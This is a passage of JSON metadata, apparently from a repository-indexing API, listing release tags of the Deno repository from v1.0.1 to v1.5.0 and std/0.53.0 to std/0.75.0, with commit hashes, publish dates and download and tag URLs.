s/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"